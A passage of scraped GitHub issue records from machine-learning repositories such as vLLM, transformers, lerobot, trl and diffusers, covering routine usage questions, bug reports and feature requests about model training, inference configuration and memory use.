\\\n\t--policy.push_to_hub=false \\\n\t--policy.use_proprio=true \\\n\t--output_dir=/home/j84403411/checkpoint/libero/pi0/libero_goal_proprio \\\n --policy.dtype=bfloat16 \\\n --steps=40_000 \\\n --batch_size=16 \\\n --rename_map='{\"observation.images.image\":\"observation.images.base_0_rgb\", \"observation.images.wrist_image\":\"observation.images.left_wrist_0_rgb\"}' \\ `\nand\n2.\n `\t--dataset.repo_id=BBBBBBob/libero_goal_lerobot \\\n\t--dataset.root=/home/j84403411/data/libero/libero_goal_lerobot \\\n\t--policy.type=pi0 \\\n --policy.pretrained_path=lerobot/pi0_base \\\n\t--policy.push_to_hub=false \\\n\t--policy.use_proprio=true \\\n\t--output_dir=/home/j84403411/checkpoint/libero/pi0/libero_goal_proprio \\\n --policy.dtype=bfloat16 \\\n --steps=40_000 \\\n --batch_size=16 \\\n --policy.input_features='{\"observation.state\": {\"type\": \"STATE\", \"shape\": [8]},\n\t\t\"observation.images.wrist_image\": {\"type\": \"VISUAL\", \"shape\": [3, 256, 256]},\n\t \t\"observation.images.image\": {\"type\": \"VISUAL\", \"shape\": [3, 256, 256]},\n\t\t}' \\\n --policy.output_features='{\"action\": {\"type\": \"ACTION\", \"shape\": [7]}}' \\ `\n\n\nThe loss trained from the second configuration is 10 times higher than the first one. What caused the difference? Do you know if different checkpoints are loaded in this case? I appreciate your help! ", "url": "https://github.com/huggingface/lerobot/issues/2543", "state": "closed", "labels": [], "created_at": "2025-11-28T12:34:38Z", "updated_at": "2025-12-01T11:25:17Z", "user": "BBBBBBob" }, { "repo": "huggingface/transformers.js", "number": 1467, "title": "Missing the following inputs: input_points, input_labels (or input_boxes)", "body": "### Question\n\nthanks for your excellent works!\n\nI just write test code for SlimSAM model powered by transformers.js referring to this example(with some improvements): https://github.com/huggingface/transformers.js-examples/blob/main/segment-anything-webgpu/index.js\n\nmy code for `decode` method:\n```js\n// Decode segmentation\nasync function decode() {\n if (!imageEmbeddings || isDecoding || isEncoding) return;\n\n if (isDecoding) {\n decodePending = true;\n return;\n }\n isDecoding = true;\n\n try {\n let input_points = null;\n let input_labels = null;\n let input_boxes = null;\n let outputs = null;\n \n if (promptMode == \"point\" && points.length > 0) {\n const reshaped = imageprocessed.reshaped_input_sizes[0]; // [H, W]\n const scaledPoints = points.map(p => [\n p.x * reshaped[1],\n p.y * reshaped[0]\n ]);\n const labels = points.map(p => BigInt(p.label));\n\n input_points = new Tensor(\"float32\", scaledPoints.flat(), [1, 1, points.length, 2]);\n input_labels = new Tensor(\"int64\", labels, [1, 1, points.length]);\n\n // Fallback: if no prompts, skip\n if (!input_points) return;\n\n // Run model with point mode\n outputs = await model({\n ...imageEmbeddings,\n input_points: input_points,\n input_labels: input_labels,\n input_boxes: null\n });\n }\n\n if (promptMode == \"box\" && box) {\n const reshaped = imageprocessed.reshaped_input_sizes[0];\n const [x1, y1, x2, y2] = [\n box.x1 * reshaped[1],\n box.y1 * reshaped[0],\n box.x2 * reshaped[1],\n box.y2 * reshaped[0]\n ];\n input_boxes = new Tensor(\"float32\", [x1, y1, x2, y2], [1, 1, 4]);\n\n // Fallback: if no prompts, skip\n if (!input_boxes) return;\n\n // Run model with box mode\n outputs = await model({\n ...imageEmbeddings,\n input_points: null,\n input_labels: null,\n input_boxes: input_boxes\n });\n }\n\n // Post-process\n const masks = await processor.post_process_masks(\n outputs.pred_masks,\n imageprocessed.original_sizes,\n imageprocessed.reshaped_input_sizes\n );\n\n const scores = outputs.iou_scores.data;\n updateMask(masks[0], scores); // masks[0] is [3, H, W]\n\n } catch (e) {\n console.error(\"Decode error:\", e);\n statusEl.textContent = \"\u274c Segmentation failed.\";\n } finally {\n isDecoding = false;\n if (decodePending) {\n decodePending = false;\n decode();\n }\n }\n}\n```\nit supports 2 prompt modes: `point` &` box` which selected by users on UI elements (html not provided).\nbut error printed every time when running `decode` method (at the line of calling `outputs = await model(...)`), the error message is:\n\nwith box prompt mode:\n`Error: An error occurred during model execution: \"Missing the following inputs: input_points, input_labels.`\n\nwith point prompt mode:\n`Error: An error occurred during model execution: \"Missing the following inputs: input_boxes.`\n\n\nShould I pass all three parameters(input_points/input_labels/input_boxes) simultaneously, regardless of which prompt mode I\u2019m using? How could I support point & box at the same time, since no demo codes found on internet. thanks!\n\n```\nversion: transformers.js 3.5.0 from https://cdn.jsdelivr.net/npm/@huggingface/transformers@3.5.0\nos: Windows 10\nchorme: 142\nmodel: Xenova/slimsam-77-uniform\n```", "url": "https://github.com/huggingface/transformers.js/issues/1467", "state": "closed", "labels": [ "question" ], "created_at": "2025-11-28T10:01:04Z", "updated_at": "2025-12-01T04:04:59Z", "user": "sherlockchou86" }, { "repo": "vllm-project/vllm", "number": 29643, "title": "[Usage]: Enabling Tool call in the Python SDK", "body": "### Your current environment\n\nHi Team,\n\nI am currently exploring VLLM to enable tool calling, and I need some support with this. It would be very helpful if you could provide the corresponding Python code.\n\nWhat I\u2019m trying to achieve is to configure the Python package with the same settings that I use when starting the VLLM server. The configuration I\u2019m using is:\n\nvllm serve DeepSeek-R1-0528-Qwen3-8B \\\n --served-model-name deepseek \\\n --gpu_memory_utilization 0.5 \\\n --max_num_seqs 20 \\\n --max_model_len 10000 \\\n --enable-auto-tool-choice \\\n --tool-call-parser deepseek_v3 \\\n --chat-template tool_chat_template_deepseekr1.jinja \\\n --port 5050 \\\n --max_num_batched_tokens 5000\n\nI need to replicate this exact configuration in Python.\n\nYour support would be greatly appreciated. Please respond at your earliest convenience.\n\nIf you want, I can also write the **Python code equivalent** for these VLLM configurations.\n\nBest Regards\nMadan \n\n\n### How would you like to use vllm\n\n\n\nI want to use vLLM to serve a model with tool-calling support enabled. Specifically, I need to run the model with the same configuration parameters that I currently use when launching the vLLM server from the command line. These settings include GPU memory utilization, maximum sequence limits, tool-calling options, a custom tool-call parser, and a custom chat template.\n\nMy goal is to reproduce the following server configuration within a Python environment using the vLLM Python API:\n\nvllm serve DeepSeek-R1-0528-Qwen3-8B \\\n --served-model-name deepseek \\\n --gpu_memory_utilization 0.5 \\\n --max_num_seqs 20 \\\n --max_model_len 10000 \\\n --enable-auto-tool-choice \\\n --tool-call-parser deepseek_v3 \\\n --chat-template tool_chat_template_deepseekr1.jinja \\\n --port 5050 \\\n --max_num_batched_tokens 5000\n`\n\nIn short, I need Python code that sets these exact configurations so I can run vLLM programmatically with tool calling enabled.\n\nIf you want, I can also provide the **Python code equivalent** for this configuration.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29643", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-28T04:39:47Z", "updated_at": "2025-12-01T14:54:47Z", "comments": 2, "user": "Madan1215" }, { "repo": "vllm-project/vllm", "number": 29641, "title": "[Bug]: Max Tokens not being honoured in Chat Completions for GPTOSS model", "body": "### Your current environment\n\nIt seems that in the latest version of vllm 0.11+ Chat Completions has stopped honouring `max_tokens` with GPTOSS 120B model, the below request payload has stopped working with `max_tokens` earlier the same payload would provide an output to the limit of the `max_tokens` provided.. \n\nInterestingly if you look at the `usage` tokens, it's showing `completion_tokens` as 500 but the output is BLANK.\n\n```json\n{\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the role of AI in medicine?\"\n }\n ],\n \"model\": \"openai/gpt-oss-120b\",\n \"max_tokens\": 500,\n \"reasoning\": {\"effort\": \"low\"},\n \"stream\": false\n}\n```\n\ngetting BLANK output, even though the `usage` is showing token counts created is matching max_tokens \n\n```json\n{\n \"id\": \"chatcmpl-c71e934ac0b74bd4b8f99fe9b5516ea3\",\n \"object\": \"chat.completion\",\n \"created\": 1764300020,\n \"model\": \"openai/gpt-oss-120b\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": null,\n \"refusal\": null,\n \"annotations\": null,\n \"audio\": null,\n \"function_call\": null,\n \"tool_calls\": [],\n \"reasoning\": \"Need to answer.\",\n \"reasoning_content\": \"Need to answer.\"\n },\n \"logprobs\": null,\n \"finish_reason\": \"length\",\n \"stop_reason\": null,\n \"token_ids\": null\n }\n ],\n \"service_tier\": null,\n \"system_fingerprint\": null,\n \"usage\": {\n \"prompt_tokens\": 78,\n \"total_tokens\": 578,\n \"completion_tokens\": 500,\n \"prompt_tokens_details\": null\n },\n \"prompt_logprobs\": null,\n \"prompt_token_ids\": null,\n \"kv_transfer_params\": null\n}\n```\n\nWhen you remove the `max_tokens`, we get the output which shows `usage_token` to have `completion_tokens` to be around 1600 tokens..\nIt seems that starting from vllm 0.11+ version, the auto-truncation using the `max_tokens` has stopped working\n\n```json\n{\n \"id\": \"chatcmpl-61b60144d43147e2b007158712ad4920\",\n \"object\": \"chat.completion\",\n \"created\": 1764300423,\n \"model\": \"openai/gpt-oss-120b\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"**The role of AI in medicine is expanding rapidly and touches virtually every aspect of healthcare\u2014from the way doctors diagnose patients to how hospitals run their operations.** Below is a structured overview that covers the major domains, concrete examples, benefits, challenges, and future directions.\\n\\n---\\n\\n## 1. Clinical Care\\n\\n| Sub\u2011area | What AI Does | Real\u2011World Examples | Benefits |\\n|----------|--------------|---------------------|----------|\\n| **Diagnostics** | Image analysis, pattern recognition, risk stratification | \u2022 Radiology: Google\u202fDeepMind\u2019s AI detects lung cancer on CT scans with >95% accuracy.
\u2022 Dermatology: FDA\u2011cleared apps (e.g., SkinVision) classify skin lesions from photos.
\u2022 Pathology: Paige.ai assists in detecting prostate cancer in biopsy slides. | Faster, more consistent readings; can catch subtle findings that human eyes miss. |\\n| **Predictive Analytics** | Forecast disease onset, complications, readmission risk | \u2022 Sepsis prediction models (e.g., Epic Sepsis Model) trigger alerts hours before clinical signs.
\u2022 Cardiovascular risk calculators incorporating genomics and wearables. | Enables proactive interventions, reduces morbidity and cost. |\\n| **Treatment Planning** | Decision support, dose optimisation, drug selection | \u2022 IBM Watson for Oncology (clinical trial matching).
\u2022 Radiation oncology: AI\u2011driven dose\u2011painting to spare healthy tissue.
\u2022 Pharmacogenomics: AI predicts drug\u2011gene interactions. | Personalises therapy, improves outcomes, reduces adverse events. |\\n| **Robotics & Minimally Invasive Surgery** | Real\u2011time image guidance, autonomous suturing, task automation | \u2022 Da Vinci Surgical System (augmented with AI for instrument tracking).
\u2022 VERDICT AI for autonomous suturing in animal models. | Increases precision, reduces surgeon fatigue, shortens recovery. |\\n\\n---\\n\\n## 2. Patient\u2011Facing Applications\\n\\n| Application | Description | Example |\\n|-------------|-------------|---------|\\n| **Virtual Assistants & Chatbots** | Symptom triage, medication reminders, mental\u2011health chat | \u2022 Babylon Health (AI\u2011driven triage).
\u2022 Woebot (CBT\u2011based mental\u2011health chatbot). |\\n| **Telemedicine Enhancements** | Real\u2011time vitals extraction from video, automated note\u2011taking | \u2022 KardiaMobile ECG integration with AI\u2011based arrhythmia detection. |\\n| **Wearables & Remote Monitoring** | Continuous data streams analysed for early alerts | \u2022 Apple Watch ECG + AI arrhythmia detection; Fitbit heart\u2011rate trend alerts. |\\n\\n---\\n\\n## 3. Operational & Administrative Efficiency\\n\\n| Domain | AI Functions | Example |", "url": "https://github.com/vllm-project/vllm/issues/29641", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-28T03:39:34Z", "updated_at": "2025-12-21T02:39:32Z", "comments": 16, "user": "soodrohit" }, { "repo": "huggingface/transformers", "number": 42464, "title": "Add SAM 3D Objects Encoder", "body": "### Model description\n\n## Model Description\n\nSAM 3D Objects is Meta AI's foundation model for 3D object reconstruction from single images. I'm proposing to add the **encoder component** (DINOv2-based Vision Transformer) to Transformers.\n\n**Scope**: Encoder only, not the full 3D generation pipeline (which includes Gaussian Splatting/Mesh decoders better suited for Diffusers).\n\n## Open source status\n\n- [x] The model implementation available\n- [x] The model weights are available\n\n## Provide useful links for the implementation\n\n- **Model Card**: https://huggingface.co/facebook/sam-3d-objects\n- **Paper**: https://arxiv.org/abs/2511.16624\n- **Original Repository**: https://github.com/facebookresearch/sam-3d-objects\n- **Blog Post**: https://ai.meta.com/blog/sam-3d/\n\n## Implementation Progress\n\nI have already implemented this model and it's ready for review:\n\n\u2705 **Implementation Complete:**\n- `Sam3DObjectsEncoderConfig` - Configuration with DINO variant support\n- `Sam3DObjectsEncoder` - Main encoder model\n- `Sam3DObjectsEncoderForMasks` - Variant for mask encoding\n- `Sam3DObjectsImageProcessor` - Image preprocessing\n- Comprehensive test suite: **28/28 tests passing**\n- Full documentation\n\n**Test Results:**\ncollected 29 items\n28 passed, 1 skipped in 4.92s\n\n**Example Usage:**\n```python\nfrom transformers.models.sam3d_objects import (\n Sam3DObjectsEncoder,\n Sam3DObjectsEncoderConfig,\n Sam3DObjectsImageProcessor,\n)\n\nconfig = Sam3DObjectsEncoderConfig.from_dino_config(\"dinov2_vitl14\")\nmodel = Sam3DObjectsEncoder(config)\nprocessor = Sam3DObjectsImageProcessor()\n\ninputs = processor(images=image, return_tensors=\"pt\")\noutputs = model(**inputs)\nembeddings = outputs.last_hidden_state\n```\n\n## Questions\n\n1. Is there interest in adding the SAM 3D Objects Encoder to Transformers?\n2. Should this be limited to the encoder component (my recommendation)?\n3. Should I submit a PR, or are there any requirements I should address first?\n\n## Additional Context\n\n- The encoder is based on DINOv2 and fits naturally in Transformers\n- Full 3D generation pipeline would be better suited for Diffusers\n- Model is gated on Hub (requires license acceptance)\n- Implementation follows Transformers patterns and guidelines\n\nI'm ready to submit a PR and address any feedback.\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n## Links\n\n- **Model Card**: https://huggingface.co/facebook/sam-3d-objects\n- **Paper**: https://arxiv.org/abs/2511.16624 (SAM 3D: 3Dfy Anything in Images)\n- **Original Repository**: https://github.com/facebookresearch/sam-3d-objects\n- **Blog Post**: https://ai.meta.com/blog/sam-3d/\n- **Project Page**: https://ai.meta.com/sam3d/\n\n## Authors\n\n**SAM 3D Team** from Meta AI\n\nFor the complete author list and contributions, see:\n- [ArXiv Paper](https://arxiv.org/abs/2511.16624)\n- [Original Repository](https://github.com/facebookresearch/sam-3d-objects)\n\n*Note: This is a large collaborative project with many contributors from Meta Superintelligence Labs.*\n\n## Implementation Details\n\n**Model Type**: Vision Encoder (DINOv2-based) \n**Architecture**: Vision Transformer (ViT) \n**Variants Supported**: \n- ViT-S/14 (384 dim)\n- ViT-B/14 (768 dim)\n- ViT-L/14 (1024 dim)\n- ViT-G/14 (1536 dim)\n\n**Input**: RGB images (224x224 or 518x518) \n**Output**: Visual embeddings for 3D generation tasks\n\n**License**: SAM License (gated model on HuggingFace Hub)", "url": "https://github.com/huggingface/transformers/issues/42464", "state": "open", "labels": [ "New model" ], "created_at": "2025-11-27T19:48:28Z", "updated_at": "2025-12-05T10:32:33Z", "comments": 1, "user": "Aznix07" }, { "repo": "vllm-project/vllm", "number": 29584, "title": "[Usage]: Can KV Cache be disabled in non-autoregressive generation tasks?", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.15 (main, Oct 3 2024, 07:27:34) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA GeForce RTX 3090\nGPU 1: NVIDIA GeForce RTX 3090\n\nNvidia driver version : 575.57.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n vLLM Info\n==============================\nROCM Version : Could not collect\nvLLM Version : 0.11.2\nvLLM Build Flags:\n CUDA Archs: Not Set; ROCm: Disabled\nGPU Topology:\n GPU0 GPU1 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X SYS 0-23,48-71 0 N/A\nGPU1 SYS X 24-47,72-95 1 N/A\n\nLegend:\n\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\n```\n\n### How would you like to use vllm\n\nHello vLLM team,\n\nCurrently, vLLM (v0.11.2) enables KV cache for certain LLM-based pooling and reranking models, such as the Qwen3-Embedding series, even when `--no-enable-chunked-prefill` and `--no-enable-prefix-caching` are set. This leads to unnecessary GPU memory usage.\n\nWould it be possible to disable KV cache for pooling and reranking models under these conditions?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29584", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-27T05:30:08Z", "updated_at": "2025-12-05T02:40:28Z", "comments": 5, "user": "GitEventhandler" }, { "repo": "vllm-project/vllm", "number": 29574, "title": "[Performance]: Using vLLM to accelerate VLM models, does the vision encoding part currently support parallel processing, or is it still being processed serially?", "body": "### Proposal to improve performance\n\nI found that currently, images of different sizes are processed sequentially, which significantly slows down the processing speed. How can we adapt to parallel processing? Should we resize or pad all images to the same size for batch processing, or can we run multiple encoder models in parallel? Thank you.\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29574", "state": "open", "labels": [ "performance" ], "created_at": "2025-11-27T03:51:36Z", "updated_at": "2025-11-27T10:54:09Z", "comments": 2, "user": "NewZxy" }, { "repo": "vllm-project/vllm", "number": 29564, "title": "[Doc]: Make PyTorch profiler gzip and CUDA time dump configurable", "body": "### \ud83d\udcda The doc issue\n\nWe observed that enabling both use_gzip and dump_self_cuda_time_total in the vLLM torch profiler introduces significant overhead during profiling.\n\nFor example, when profiling 10 randomly generated requests (1000 input tokens, 200 output tokens) on an A100 using the Qwen3-32B model, we found that gzip compression of the profiling trace and dumping the CUDA time table take ~68 seconds, dominating the overall profiling time.\n\nThe main sources of overhead appear to be:\n1. Gzip compression of the profiling trace file\n2. Generation and dumping of the CUDA time summary table\n\nAfter disabling these two features, the total profiling dump time is reduced to ~18 seconds.\n\nIn many profiling scenarios (e.g., quick performance checks or small-scale experiments), users may not need gzip compression or the CUDA time table. Therefore, it would be helpful to make these two behaviors individually configurable via environment variables\u2014enabled by default for completeness, but optionally turnable off when faster profiling turnaround is preferred. Moreover, gzip compression could potentially be performed asynchronously after the trace is dumped, allowing lower-latency profiling in staging or pre-production environments.\n\nThis patch proposes adding such configurability so users can selectively disable gzip compression and/or CUDA time table generation when they want a faster and lighter profiling workflow.\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29564", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-27T02:21:20Z", "updated_at": "2025-12-01T04:30:48Z", "comments": 1, "user": "zhangruoxu" }, { "repo": "vllm-project/vllm", "number": 29562, "title": "[Bug]: \"\\n\\n\" content between reasoning and tool_call content when tool_call and stream mode", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nhttps://github.com/QwenLM/Qwen3/issues/1755\n\nWhen stream mode true, the response contains content \"\\n\\n\" between reasoning and tool_call; but with stream model false, it didn't generate content \"\\n\\n\".\n\nIs there some thing different, I don't want the content \"\\n\\n\" between reasoning and tool_call.\n\n\"Image\"\n\nHere is my requests:\n```\n{\n \"model\": \"Qwen3-235B-A22B-Thinking-2507\",\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"search_law_articles\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"level\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u6cd5\u89c4\u7c7b\u578b\"\n },\n \"query\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u67e5\u8be2\u8bed\u53e5\"\n },\n \"title\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u6cd5\u5f8b\u6807\u9898\"\n },\n \"article\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u6cd5\u5f8b\u6761\u6b3e\u5e8f\u53f7\uff0c\u5982 \u7b2c\u5341\u6761\"\n },\n \"content\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u6cd5\u5f8b\u6761\u6b3e\u53ca\u5185\u5bb9\uff0c\u5982 \u7b2c\u5341\u6761 \u8d37\u6b3e\u4eba\u59d4\u6258\u652f\u4ed8\"\n },\n \"pub_department\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u53d1\u5e03\u90e8\u95e8\"\n },\n \"pub_time_after\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u53d1\u5e03\u65f6\u95f4\u665a\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n },\n \"pub_time_before\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u53d1\u5e03\u65f6\u95f4\u65e9\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n },\n \"imply_time_after\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u5b9e\u65bd\u65f6\u95f4\u665a\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n },\n \"imply_time_before\": {\n \"anyOf\": [\n {\n \"type\": \"string\"\n },\n {\n \"type\": \"null\"\n }\n ],\n \"default\": null,\n \"description\": \"\u641c\u7d22\u6761\u4ef6\uff1a\u5b9e\u65bd\u65f6\u95f4\u65e9\u4e8e\u6b64\u65f6\u95f4\uff0c\u683c\u5f0f\u59822025-06-20\"\n }\n }\n },\n \"description\": \"\u6b64\u5de5\u5177\u7528\u4e8e\u641c\u7d22\u6cd5\u6761\u5185\u5bb9\uff0c \u5e93\u4e2d\u662f\u6309\u7167\u6cd5\u5f8b\u6761\u76ee\u8fdb\u884c\u5b58\u50a8\uff0c \u67e5\u8be2\u53ef\u9009\u591a\u4e2a\u67e5\u8be2\u8fc7\u6ee4\u6761\u4ef6\"\n }\n }\n ],\n \"stream\": true,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"text\": \"\u5e2e\u6211\u89e3\u8bfb\u4e0b\u7f51\u7edc\u5b89\u5168\u6cd5\",\n \"type\": \"text\"\n }\n ]\n }\n ]\n}\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29562", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-27T01:49:04Z", "updated_at": "2025-11-27T01:49:04Z", "comments": 0, "user": "NiuBlibing" }, { "repo": "vllm-project/vllm", "number": 29560, "title": "[Doc]: Batch Invariance on Ampere Platforms", "body": "### \ud83d\udcda The doc issue\n\nDoes the batch invariance feature released in vllm 0.11.2 support the Ampere architecture? If adaptations are required, what modifications need to be made?\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29560", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-27T01:06:49Z", "updated_at": "2025-11-27T14:21:30Z", "comments": 0, "user": "luo1206" }, { "repo": "huggingface/trl", "number": 4582, "title": "Does the GRPO Trainer support multi-image input for Qwen3-VL?", "body": "Does the GRPO Trainer support multi-image input for Qwen3-VL?", "url": "https://github.com/huggingface/trl/issues/4582", "state": "open", "labels": [ "\ud83c\udfcb GRPO" ], "created_at": "2025-11-26T14:03:57Z", "updated_at": "2025-11-27T08:08:25Z", "comments": 1, "user": "Lestoky" }, { "repo": "huggingface/diffusers", "number": 12722, "title": "How to run qwen-image in kaggle gpu T4 * 2 successfully?", "body": "```python3\n!python3 -m pip install -U diffusers peft bitsandbytes\nimport diffusers, torch, math\nqwen = diffusers.QwenImagePipeline.from_pretrained('Qwen/Qwen-Image', torch_dtype=torch.float16, low_cpu_mem_usage=True, quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_4bit', quant_kwargs={'load_in_4bit':True, 'bnb_4bit_quant_type':'nf4', 'bnb_4bit_compute_dtype':torch.float16}, components_to_quantize=['transformer', 'text_encoder']))\nqwen.scheduler = diffusers.FlowMatchEulerDiscreteScheduler.from_config({'base_image_seq_len':256, 'base_shift':math.log(3), 'invert_sigmas':False, 'max_image_seq_len':8192, 'max_shift':math.log(3), 'num_train_timesteps':1000, 'shift':1, 'shift_terminal':None, 'stochastic_sampling':False, 'time_shift_type':'exponential', 'use_beta_sigmas':False, 'use_dynamic_shifting':True, 'use_exponential_sigmas':False, 'use_karras_sigmas':False})\nqwen.load_lora_weights('lightx2v/Qwen-Image-Lightning', weight_name='Qwen-Image-Lightning-4steps-V2.0.safetensors', adapter_name='lightning')\nqwen.set_adapters('lightning', adapter_weights=1)\nqwen.enable_sequential_cpu_offload()\nqwen(prompt='a beautiful girl', height=1280, width=720, num_inference_steps=4, true_cfg_scale=1).images[0].save('a.png')\n```\n----> 3 qwen = diffusers.QwenImagePipeline.from_pretrained('Qwen/Qwen-Image', torch_dtype=torch.float16, low_cpu_mem_usage=True, quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_4bit', quant_kwargs={'load_in_4bit':True, 'bnb_4bit_quant_type':'nf4', 'bnb_4bit_compute_dtype':torch.float16}, components_to_quantize=['transformer', 'text_encoder']))\n\nOutOfMemoryError: CUDA out of memory. Tried to allocate 34.00 MiB. GPU 0 has a total capacity of 14.74 GiB of which 4.19 MiB is free. Process 8568 has 14.73 GiB memory in use. Of the allocated memory 14.50 GiB is allocated by PyTorch, and 129.00 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n\nHow to get more cuda memory?\n\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/12722", "state": "open", "labels": [], "created_at": "2025-11-26T12:53:30Z", "updated_at": "2025-11-28T03:54:07Z", "user": "chaowenguo" }, { "repo": "vllm-project/vllm", "number": 29494, "title": "[Doc]: Documentation inconsistency: Blog mentions append_slots() but codebase uses allocate_slots()", "body": "### \ud83d\udcda The doc issue\n\nThe Automatic Prefix Caching blog post mentions:\n> \"The scheduler calls kv_cache_manager.append_slots()\"\n\nHowever, the actual codebase uses a unified `kv_cache_manager.allocate_slots()` method that handles both prefill and decode requests.\n\n**Location:**\n- Blog: [[link to blog post](https://docs.vllm.ai/en/v0.8.5/design/v1/prefix_caching.html#operations)]\n- Code: ./vllm/v1/core/kv_cache_manager.py\n\n### Suggest a potential alternative/fix\n\nUpdate the blog post to reflect the actual implementation `kv_cache_manager.allocate_slots()`\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29494", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-26T11:37:40Z", 